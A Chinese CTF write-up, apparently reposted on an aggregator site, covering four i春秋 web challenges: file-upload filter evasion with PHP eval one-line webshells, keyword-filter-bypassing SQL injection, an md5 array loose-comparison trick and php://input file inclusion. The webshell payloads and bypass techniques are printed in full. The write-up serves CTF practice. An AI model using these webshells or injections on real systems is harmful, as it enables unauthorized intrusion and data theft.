前言：
時間過的真快呀，一轉眼半學期就過去了(￣m￣）；攻防世界上的題差不多刷完了(剩下的都是不會的T_T)，這周就來做做 i春秋的題，順便記錄下。

---

1、想怎么傳就怎么傳，就是這么任性。

題型： Web Upload

這題就是一個簡單的文件上傳題目；先用一個普通的php小馬試一下：<?php @eval($_POST['smk']);?>
然后發現文件是上傳成功了，但是<? php被過濾掉了
于是在網上找到另一個一句話，將php用大寫繞過 修改后如下：
<script language="pHp">@eval($_POST['smk'])</script>
然后連接菜刀就能看到flag了。

2、出題人就告訴你這是個注入，有種別走！

題型： Web Sql

打開題目：

看到題目的url就知道要對id注入。首先試一下order by，發現錯誤，可能是關鍵字過濾。試了試/**/還是不行，改用<>發現可以了，如圖：

測試得字段數為3，接下來就沒啥好說的了，按順序，爆庫爆表爆字段




得到flag。

3、這個真的是爆破。

題型：Misc Web

打開題目，看到一段php語句：

error_reporting(0);// 關閉錯誤報告 session_start();//啟動會話 require('./flag.php'); if(!isset($_SESSION['nums'])){//isset() — 檢測變量是否設置。$_SESSION['nums'] = 0;$_SESSION['time'] = time();//返回當前時間的 Unix 時間戳$_SESSION['whoami'] = 'ea'; }if($_SESSION['time']+120<time()){session_destroy();//session_destroy — 銷毀一個會話中的全部數據 }//120s后會話結束$value = $_REQUEST['value']; $str_rand = range('a', 'z');//range創建一個包含從 "a" 到 "z" 之間的元素范圍的數組 $str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];//mt_rand() 使用 Mersenne Twister 算法返回0到25之間的隨機整數。$str_rand[mt_rand(0,25)]返回"a" 到 "z"之間任意字母。$str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)]是兩任意字母相連if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){//substr(string,start,length)。===是包括變量值與類型完全相等。==只是比較兩個數的值是否相等，由于substr是字符串，和數字比較的時候會強制轉化成數字0，自然和0相等。$_SESSION['nums']++;$_SESSION['whoami'] = $str_rands;echo $str_rands; }if($_SESSION['nums']>=10){//循環10次輸出flag，暴力破解echo $flag; }show_source(__FILE__); ?>

因為md5不能對數組進行處理，MD5()計算數組會返回null，里面的判斷是用==所以我們用數組傳值那么substr(md5($value),5,4)==0這個條件恒成立。
因為我剛訪問由于這段代碼$_SESSION['whoami'] = 'ea'; 我們要先傳入?value[]=ea

那么nums就會自增，$_SEESION['whoami'] = 隨機2個字母

并同時輸出到頁面上，我們再根據輸出的字符修改$value[0].$value[1]的值即可，只要操作大于等于10次，就可以出flag 。

綜上所述循環10次后輸出flag：

4、沒錯！就是文件包含漏洞

題型：Web Upload
知識點：
1、當php開啟allow_url_include的時候，可以用php://input偽協議包含文件
2、php中的system命令執行函數

這題也挺簡單，利用了php偽協議 ：

php://input
構造場景：本地web服務器根目錄下有文件phpinput_server.php，代碼如下：

<?php$a = $_GET['a'];$raw_post_data = file_get_contents($a,'r');//'php://input'echo $raw_post_data; ?>

在瀏覽器中按照如下方式訪問：
地址欄輸入的是：http://localhost/phpinput_server.php?a=php://input
post框直接輸入一段數據
Excute后，腳本會在頁面中輸出這段數據。

總結：此種方式可以用來獲取post數據，但不能獲取get數據。

既然題目是文件包含，我們來看下關鍵性函數的狀態
allow_url_include

當allow_url_include為On而allow_url_fopen為Off的時候，我們可以用用php://input偽協議進行包含

可以看到目錄下有三個文件，flag是在第一個文件里
查看dle345aae.php：
右鍵查看源碼：得到flag

總結

以上是生活随笔為你收集整理的i春秋做题记录 web(一)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。